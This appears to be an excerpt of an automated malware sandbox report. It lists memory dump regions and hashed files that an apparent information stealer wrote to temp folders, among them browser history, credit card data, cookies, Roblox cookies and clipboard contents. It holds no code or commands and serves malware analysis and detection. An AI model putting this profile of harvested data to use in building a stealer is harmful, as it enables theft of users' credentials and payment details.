memory/5956-364-0x00007FFED8C40000-0x00007FFED8D0D000-memory.dmp
memory/5956-352-0x00007FFED6B20000-0x00007FFED71E5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\QgTIhQ1HNR\Browser\history.txt
| MD5 | 5638715e9aaa8d3f45999ec395e18e77 |
| SHA1 | 4e3dc4a1123edddf06d92575a033b42a662fe4ad |
| SHA256 | 4db7f6559c454d34d9c2d557524603c3f52649c2d69b26b6e8384a3d179aeae6 |
| SHA512 | 78c96efab1d941e34d3137eae32cef041e2db5b0ebbf883e6a2effa79a323f66e00cfb7c45eb3398b3cbd0469a2be513c3ff63e5622261857eefc1685f77f76b |
C:\Users\Admin\AppData\Local\Temp\QgTIhQ1HNR\Browser\cc's.txt
| MD5 | 5aa796b6950a92a226cc5c98ed1c47e8 |
| SHA1 | 6706a4082fc2c141272122f1ca424a446506c44d |
| SHA256 | c4c83da3a904a4e7114f9bd46790db502cdd04800e684accb991cd1a08ee151c |
| SHA512 | 976f403257671e8f652bf988f4047202e1a0fd368fdb2bab2e79ece1c20c7eb775c4b3a8853c223d4f750f4192cd09455ff024918276dc1dd1442fa3b36623ad |
memory/5956-397-0x00007FFEF2870000-0x00007FFEF287F000-memory.dmp
memory/5956-426-0x00007FFED93F0000-0x00007FFED93FC000-memory.dmp
memory/5956-438-0x00007FFED7290000-0x00007FFED729C000-memory.dmp
memory/5956-446-0x00007FFED6030000-0x00007FFED605E000-memory.dmp
memory/5956-447-0x00007FFEF2870000-0x00007FFEF287F000-memory.dmp
memory/5956-445-0x00007FFED6060000-0x00007FFED6089000-memory.dmp
memory/5956-444-0x00007FFED60A0000-0x00007FFED62E5000-memory.dmp
memory/5956-443-0x00007FFED62F0000-0x00007FFED62FC000-memory.dmp
memory/5956-442-0x00007FFED6300000-0x00007FFED6312000-memory.dmp
memory/5956-441-0x00007FFED6330000-0x00007FFED633C000-memory.dmp
memory/5956-440-0x00007FFED6320000-0x00007FFED632D000-memory.dmp
memory/5956-439-0x00007FFED6340000-0x00007FFED634C000-memory.dmp
memory/5956-437-0x00007FFED7270000-0x00007FFED727B000-memory.dmp
memory/5956-436-0x00007FFED7280000-0x00007FFED728B000-memory.dmp
memory/5956-435-0x00007FFED8DE0000-0x00007FFED8E05000-memory.dmp
memory/5956-432-0x00007FFED72A0000-0x00007FFED72AE000-memory.dmp
memory/5956-431-0x00007FFED72B0000-0x00007FFED72BC000-memory.dmp
memory/5956-430-0x00007FFED72C0000-0x00007FFED72CC000-memory.dmp
memory/5956-429-0x00007FFED7D00000-0x00007FFED7D0B000-memory.dmp
memory/5956-428-0x00007FFED80D0000-0x00007FFED80DC000-memory.dmp
memory/5956-427-0x00007FFED8670000-0x00007FFED867B000-memory.dmp
memory/5956-423-0x00007FFED6350000-0x00007FFED646B000-memory.dmp
memory/5956-422-0x00007FFED72D0000-0x00007FFED72F7000-memory.dmp
memory/5956-421-0x00007FFEE36E0000-0x00007FFEE36EB000-memory.dmp
memory/5956-420-0x00007FFED7300000-0x00007FFED7387000-memory.dmp
memory/5956-419-0x00007FFED8BE0000-0x00007FFED8BF8000-memory.dmp
memory/5956-418-0x00007FFED6470000-0x00007FFED65EE000-memory.dmp
memory/5956-417-0x00007FFED7390000-0x00007FFED73B4000-memory.dmp
memory/5956-416-0x00007FFED80E0000-0x00007FFED8115000-memory.dmp
memory/5956-415-0x00007FFED8C00000-0x00007FFED8C12000-memory.dmp
memory/5956-414-0x00007FFED8C20000-0x00007FFED8C36000-memory.dmp
memory/5956-413-0x00007FFED8C40000-0x00007FFED8D0D000-memory.dmp
memory/5956-434-0x00007FFEE9660000-0x00007FFEE966F000-memory.dmp
memory/5956-410-0x00007FFED8D50000-0x00007FFED8D64000-memory.dmp
memory/5956-409-0x00007FFEE5CB0000-0x00007FFEE5CBD000-memory.dmp
memory/5956-408-0x00007FFEE6770000-0x00007FFEE677D000-memory.dmp
memory/5956-407-0x00007FFED8D70000-0x00007FFED8D89000-memory.dmp
memory/5956-406-0x00007FFEE88A0000-0x00007FFEE88AD000-memory.dmp
memory/5956-405-0x00007FFED8D90000-0x00007FFED8DBD000-memory.dmp
memory/5956-404-0x00007FFED8DC0000-0x00007FFED8DDA000-memory.dmp
memory/5956-401-0x00007FFED6B20000-0x00007FFED71E5000-memory.dmp
memory/5956-425-0x00007FFED9530000-0x00007FFED953B000-memory.dmp
memory/5956-424-0x00007FFEE0E30000-0x00007FFEE0E3B000-memory.dmp
memory/5956-411-0x00007FFED65F0000-0x00007FFED6B19000-memory.dmp
memory/5956-412-0x00007FFED8D10000-0x00007FFED8D43000-memory.dmp
memory/376-577-0x00007FFEDAA40000-0x00007FFEDB105000-memory.dmp
memory/376-579-0x00007FFEF2850000-0x00007FFEF285F000-memory.dmp
memory/376-578-0x00007FFEEA0C0000-0x00007FFEEA0E5000-memory.dmp
memory/376-581-0x00007FFEEA050000-0x00007FFEEA07D000-memory.dmp
memory/376-580-0x00007FFEEA3B0000-0x00007FFEEA3CA000-memory.dmp
memory/376-584-0x00007FFEE9B60000-0x00007FFEE9B6D000-memory.dmp
memory/376-583-0x00007FFEE9D00000-0x00007FFEE9D19000-memory.dmp
memory/376-582-0x00007FFEEA0B0000-0x00007FFEEA0BD000-memory.dmp
memory/376-585-0x00007FFEE9B50000-0x00007FFEE9B5D000-memory.dmp
memory/376-587-0x00007FFEDA510000-0x00007FFEDAA39000-memory.dmp
memory/376-586-0x00007FFEE9430000-0x00007FFEE9444000-memory.dmp
memory/376-589-0x00007FFEDA440000-0x00007FFEDA50D000-memory.dmp
memory/376-588-0x00007FFEE93F0000-0x00007FFEE9423000-memory.dmp
memory/376-591-0x00007FFEE93B0000-0x00007FFEE93C2000-memory.dmp
memory/376-590-0x00007FFEE93D0000-0x00007FFEE93E6000-memory.dmp
memory/376-592-0x00007FFEDAA40000-0x00007FFEDB105000-memory.dmp
memory/376-595-0x00007FFEEA0C0000-0x00007FFEEA0E5000-memory.dmp
memory/376-596-0x00007FFEDA280000-0x00007FFEDA3FE000-memory.dmp
memory/376-597-0x00007FFED9BC0000-0x00007FFED9BD8000-memory.dmp
memory/376-599-0x00007FFED98D0000-0x00007FFED9957000-memory.dmp
memory/376-598-0x00007FFEEA0B0000-0x00007FFEEA0BD000-memory.dmp
memory/376-594-0x00007FFEE9380000-0x00007FFEE93A4000-memory.dmp
memory/376-593-0x00007FFEDA400000-0x00007FFEDA435000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\0Fyulgn2H4\Browser\roblox cookies.txt
| MD5 | de9ec9fc7c87635cb91e05c792e94140 |
| SHA1 | 3f0fbeaff23a30040e5f52b78b474e7cb23488ab |
| SHA256 | aac2a87a65cbbe472000734bd6db5c76f0ffed78e80928f575d5573f3ac94d0f |
| SHA512 | a18ff0f277d880cf249fe7ef20fa026fd8126121fbb6f1de33d3d4a08d37084c662724053c6e8e2035aa7c347000e14a9c12698017ac72b327db6473d6e4af56 |
C:\Users\Admin\AppData\Local\Temp\0Fyulgn2H4\Browser\cookies.txt
| MD5 | 357c18b5c470aa5214819ed2e11882f9 |
| SHA1 | 262726528ac6ece5ef69b48cbf69e9d3c79bbc2d |
| SHA256 | e04233c3a65810f382471c2c1484cc71df6f2078d56bd91f478ed99790ac11f5 |
| SHA512 | a84eaa0f8466ef145e765b3c340120a7947aad6ded63c301be5a5c4dea15f603ae0a295c8d7d9828a8f660edfa058edf96abc6950eebbbafe3af402a4b37d683 |
C:\Users\Admin\AppData\Local\Temp\0Fyulgn2H4\Clipboard\clipboard.txt
| MD5 | 3f86226eca1b8b351d9c5b11dcdbcdfa |
| SHA1 | 576f70164e26ad8dbdb346cd72c26323f10059ac |
| SHA256 | 0d50f046634b25bcfc3ffb0a9feff8ab43e662c8872df933cb15b68050a5bb8c |
| SHA512 | 150d95510e0f83ef0e416e1a18663a70f85ff4d09c620fcf355b18df3e939d232054a5be5bbb1b22e050167e61c243d7e89e13c0770cfedbae49b1b8e10d8753 |
C:\Users\Admin\tmp\ecC7oLKJfv
| MD5 | 42c395b8db48b6ce3d34c301d1eba9d5 |
| SHA1 | b7cfa3de344814bec105391663c0df4a74310996 |
| SHA256 | 5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d |
| SHA512 | 7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 96ff1ee586a153b4e7ce8661cabc0442 |
| SHA1 | 140d4ff1840cb40601489f3826954386af612136 |
| SHA256 | 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8 |
| SHA512 | 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569 |